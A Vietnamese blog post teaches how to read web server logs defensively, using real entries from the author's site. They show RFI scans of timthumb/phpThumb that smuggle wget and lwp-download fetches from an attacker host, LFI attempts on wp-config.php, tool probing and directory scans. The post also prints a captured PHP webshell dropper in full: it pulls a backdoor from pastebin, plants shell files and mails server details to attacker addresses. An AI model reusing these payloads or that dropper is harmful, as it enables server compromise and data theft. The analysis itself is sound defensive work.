Một trong những việc bắt buộc với công việc bảo mật là đọc nhật ký server hay còn gọi là log. đây là việc khá quan trọng để từ đó bạn có biện pháp xử lý nhanh nhất có thể cũng như khoanh vùng được mã độc. Dưới đây là một số ví dụ cũng như ý nghĩa log trên chính trang web này của tôi
Ví dụ 1: đọc log tôi phát hiện ra mình đang bị scan RFI và mã độc nếu có của tôi
162.158.161.152 - - [21/Jan/2020:07:27:11 +0000] "GET /wp-content/themes/Newspaper/tim.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.212 - - [21/Jan/2020:07:27:12 +0000] "GET /wp-content/themes/Newspaper/timthumb.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.17 - - [21/Jan/2020:07:27:12 +0000] "GET /wp-content/themes/Newspaper/thumb.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.68.145.235 - - [21/Jan/2020:07:27:12 +0000] "GET /wp-content/themes/Newspaper/functions/timthumb.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.62 - - [21/Jan/2020:07:27:12 +0000] "GET /wp-content/themes/Newspaper/functions/thumb.php?src=http://blogger.com.finalthemes.com/kontol.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.163.111 - - [21/Jan/2020:07:27:13 +0000] "GET /wp-content/themes/Newspaper//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.152 - - [21/Jan/2020:07:27:14 +0000] "GET /wp-content/themes/Newspaper/thumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.110 - - [21/Jan/2020:07:27:15 +0000] "GET /wp-content/themes/Newspaper/phpthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.254 - - [21/Jan/2020:07:27:15 +0000] "GET /wp-content/themes/Newspaper/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.162.93 - - [21/Jan/2020:07:27:15 +0000] "GET /wp-content/themes/Newspaper//util/phpthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.152 - - [21/Jan/2020:07:27:16 +0000] "GET /wp-content/themes/Newspaper/images/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.110 - - [21/Jan/2020:07:27:16 +0000] "GET /wp-content/themes/Newspaper/core/lib/imgthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.182 - - [21/Jan/2020:07:27:17 +0000] "GET /wp-content/themes/Newspaper/images/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download%20http://blogger.com.finalthemes.com/will.php%20phpthumbs.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.68.145.241 - - [21/Jan/2020:07:27:17 +0000] "GET /wp-content/themes/Newspaper//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.162.93 - - [21/Jan/2020:07:27:17 +0000] "GET /wp-content/themes/Newspaper/thumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.17 - - [21/Jan/2020:07:27:18 +0000] "GET /wp-content/themes/Newspaper/phpthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.68.145.235 - - [21/Jan/2020:07:27:18 +0000] "GET /wp-content/themes/Newspaper/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.131 - - [21/Jan/2020:07:27:18 +0000] "GET /wp-content/themes/Newspaper//util/phpthumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.62 - - [21/Jan/2020:07:27:18 +0000] "GET /wp-content/themes/Newspaper/images/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.68.145.235 - - [21/Jan/2020:07:27:19 +0000] "GET /wp-content/themes/Newspaper/core/lib/imgthumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.114 - - [21/Jan/2020:07:27:19 +0000] "GET /wp-content/themes/Newspaper/images/phpThumb//phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;wget%20%20http://blogger.com.finalthemes.com/will.php;&phpThumbDebug=9 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" |
Mã độc tôi lấy được từ log
GIF89a; | |
<?php | |
error_reporting(0); | |
function parah($url){ | |
$im = curl_init($url); | |
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); | |
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($im, CURLOPT_HEADER, 0); | |
return curl_exec($im); | |
curl_close($im); | |
} | |
echo '<center><br><b>h0d3_g4nT3nG'.'<br>'.'Uname:'.php_uname().'<br></b></center>'; | |
$asu =rand(); | |
$filename="dont-dell$asu.php"; | |
$fget=file_get_contents("https://pastebin.com/raw/UkW9ywcC"); | |
// WGET Backdoor | |
$path=getcwd().DIRECTORY_SEPARATOR; | |
$fileopen=fopen("$path/$filename",'w'); | |
$execfile=fwrite($fileopen,$fget); | |
if($execfile) | |
{ | |
echo "Success UP: $path$filename <br>"; | |
} | |
else { | |
echo "Failed execute newfile $filename in $path <br>"; | |
} | |
if(isset($_POST['Submit'])){ | |
$filedir = ""; | |
$maxfile = '2000000'; | |
$mode = '0644'; | |
$userfile_name = $_FILES['image']['name']; | |
$userfile_tmp = $_FILES['image']['tmp_name']; | |
if(isset($_FILES['image']['name'])) { | |
$qx = $filedir.$userfile_name; | |
@move_uploaded_file($userfile_tmp, $qx); | |
@chmod ($qx, octdec($mode)); | |
echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>"; | |
} | |
} | |
else{ | |
echo'<center><form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form></center>'; | |
} | |
$web = $_SERVER['HTTP_HOST'].""; | |
$upload = $_SERVER['DOCUMENT_ROOT']. "/jembu$asu.php"; | |
$config = parah("https://pastebin.com/raw/UkW9ywcC"); | |
$open = fopen($upload, 'w'); | |
fwrite($open, $config); | |
fclose($open); | |
if(file_exists($upload)){ | |
echo "Shell Ke Upload : http://$web/jembu$asu.php<br>" ; | |
}else { | |
echo "Gagal Upload Shell -_- <br>"; | |
} | |
$tujuanmail = 'barbarnime@gmail.com,tukangcekstil@hotmail.com'; | |
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; | |
$pesan_alert = "fix $x_path :p $path$filename \n Uname : ".php_uname()." \n Acess : http://$web/jembu$asu.php \n *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ] \n"; | |
@mail($tujuanmail, "Timthumb Bot !!", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); | |
?> |
Ví dụ 2: Từ log tôi biết mình bị tấn công LFI
162.158.161.110 - - [14/Jan/2020:04:12:43 +0000] "GET /wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=../../../wp-config.php&action=asdf HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" | |
162.158.161.66 - - [15/Jan/2020:18:40:10 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 400 11 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.38 - - [16/Jan/2020:01:17:14 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 400 11 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.68.145.6 - - [16/Jan/2020:08:27:48 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 732 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.65 - - [17/Jan/2020:15:20:48 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 400 11 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.68.145.235 - - [17/Jan/2020:15:21:38 +0000] "GET /wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.83 - - [17/Jan/2020:15:21:57 +0000] "GET /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.48 - - [17/Jan/2020:15:21:58 +0000] "GET /wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.242 - - [18/Jan/2020:18:24:12 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" | |
172.69.132.110 - - [18/Jan/2020:18:24:13 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" | |
162.158.164.221 - - [20/Jan/2020:10:48:05 +0000] "GET /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" | |
172.69.132.254 - - [20/Jan/2020:10:48:10 +0000] "GET /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=../../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" | |
172.69.132.242 - - [21/Jan/2020:07:25:42 +0000] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" | |
162.158.161.65 - - [21/Jan/2020:07:25:44 +0000] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" |
Ví Dụ 3: server của tôi đang bị nhòm ngó bằng công cụ nào đó viết bằng python hoặc perl
162.158.161.37 - - [14/Jan/2020:06:29:25 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.66 - - [14/Jan/2020:06:29:27 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.68.145.6 - - [14/Jan/2020:06:29:41 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.68.145.6 - - [14/Jan/2020:06:29:44 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.69.132.230 - - [14/Jan/2020:06:29:53 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.66 - - [14/Jan/2020:06:30:00 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.37 - - [14/Jan/2020:06:30:08 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.68.145.6 - - [14/Jan/2020:06:30:11 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.37 - - [14/Jan/2020:06:30:18 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.68.145.6 - - [14/Jan/2020:06:30:24 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.69.132.230 - - [14/Jan/2020:06:30:30 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.69.132.230 - - [14/Jan/2020:06:30:39 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.66 - - [14/Jan/2020:06:30:45 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.68.145.6 - - [14/Jan/2020:06:30:47 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.68.145.6 - - [14/Jan/2020:06:30:51 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.66 - - [14/Jan/2020:06:30:53 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.69.132.230 - - [14/Jan/2020:06:30:56 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.37 - - [14/Jan/2020:06:31:00 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
162.158.161.37 - - [14/Jan/2020:06:31:02 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" | |
172.69.132.230 - - [14/Jan/2020:06:31:05 +0000] "HEAD / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0" |
Tôi phát hiện được đây là tools vì đơn giản tôi làm quá nhiều với nó và thường tools các thư viện nó sẽ dùng HEAD đầu tiên để test kết nối website.
Ví Dụ 4: server của tôi đang bị dò thư mục để nhằm tìm kiếm thông tin nhậy cảm
172.69.132.212 - - [20/Jan/2020:21:13:35 +0000] "GET /?author=4 HTTP/1.1" 404 25824 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" | |
162.158.161.38 - - [20/Jan/2020:23:00:39 +0000] "GET /wp-po.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" | |
172.69.132.242 - - [20/Jan/2020:23:32:38 +0000] "GET /wp/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
162.158.161.14 - - [20/Jan/2020:23:32:52 +0000] "GET /blog/ HTTP/1.1" 404 25823 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
162.158.161.14 - - [20/Jan/2020:23:33:18 +0000] "GET /old/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.68.145.6 - - [20/Jan/2020:23:33:29 +0000] "GET /test/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.69.132.242 - - [20/Jan/2020:23:33:37 +0000] "GET /main/ HTTP/1.1" 404 25812 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.69.132.242 - - [20/Jan/2020:23:33:56 +0000] "GET /site/ HTTP/1.1" 404 25812 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
162.158.161.14 - - [20/Jan/2020:23:34:08 +0000] "GET /backup/ HTTP/1.1" 404 25812 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
162.158.161.65 - - [20/Jan/2020:23:34:20 +0000] "GET /demo/ HTTP/1.1" 404 25812 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.69.132.242 - - [20/Jan/2020:23:34:33 +0000] "GET /home/ HTTP/1.1" 404 25817 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.69.132.242 - - [20/Jan/2020:23:34:45 +0000] "GET /tmp/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.68.145.6 - - [20/Jan/2020:23:34:56 +0000] "GET /cms/ HTTP/1.1" 404 25821 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.68.145.6 - - [20/Jan/2020:23:35:07 +0000] "GET /dev/ HTTP/1.1" 404 25814 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.68.145.6 - - [20/Jan/2020:23:35:18 +0000] "GET /portal/ HTTP/1.1" 404 25817 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.68.145.6 - - [20/Jan/2020:23:35:29 +0000] "GET /web/ HTTP/1.1" 404 25815 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
162.158.161.14 - - [20/Jan/2020:23:35:41 +0000] "GET /temp/ HTTP/1.1" 404 25817 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" | |
172.68.145.6 - - [21/Jan/2020:00:03:43 +0000] "GET /?author=4 HTTP/1.1" 404 25837 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" | |
162.158.163.105 - - [21/Jan/2020:00:10:30 +0000] "GET /?author=4 HTTP/1.1" 404 25827 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" |
162.158.161.65 - - [18/Jan/2020:17:25:54 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/ HTTP/1.1" 404 25878 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.254 - - [18/Jan/2020:17:26:07 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/files/199877.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.65 - - [18/Jan/2020:17:44:55 +0000] "GET /chuyenmuc/reviews/?filter_by=review_high HTTP/1.1" 404 25823 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)" | |
162.158.161.14 - - [18/Jan/2020:18:18:11 +0000] "GET /kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.163.84 - - [18/Jan/2020:18:18:11 +0000] "GET /admin/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.83 - - [18/Jan/2020:18:18:11 +0000] "GET /plugins/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.122 - - [18/Jan/2020:18:18:11 +0000] "GET /assets/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.38 - - [18/Jan/2020:18:18:11 +0000] "GET /admin/editor/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.83 - - [18/Jan/2020:18:18:11 +0000] "GET /ckeditor/plugins/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.83 - - [18/Jan/2020:18:18:12 +0000] "GET /assets/plugin/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.242 - - [18/Jan/2020:18:18:12 +0000] "GET /vendor/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.206 - - [18/Jan/2020:18:18:12 +0000] "GET /kcfinder-2.51/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.48 - - [18/Jan/2020:18:18:12 +0000] "GET /scripts/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.114 - - [18/Jan/2020:18:18:12 +0000] "GET /core/scripts/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.163.105 - - [18/Jan/2020:18:18:12 +0000] "GET /scripts/kcfinder-2.51/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.14 - - [18/Jan/2020:18:18:12 +0000] "GET /admin/scripts/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
162.158.161.131 - - [18/Jan/2020:18:18:12 +0000] "GET /assets/admin/js/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.20 - - [18/Jan/2020:18:18:12 +0000] "GET /admin/js/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
172.69.132.182 - - [18/Jan/2020:18:18:12 +0000] "GET /js/kcfinder/upload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0" | |
